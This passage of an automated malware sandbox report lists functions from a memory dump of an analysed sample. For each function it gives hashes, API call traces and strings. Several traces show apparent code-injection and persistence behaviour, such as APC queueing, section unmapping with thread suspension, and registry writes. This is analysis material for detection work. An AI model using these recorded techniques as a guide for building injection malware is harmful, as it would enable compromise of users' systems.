  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
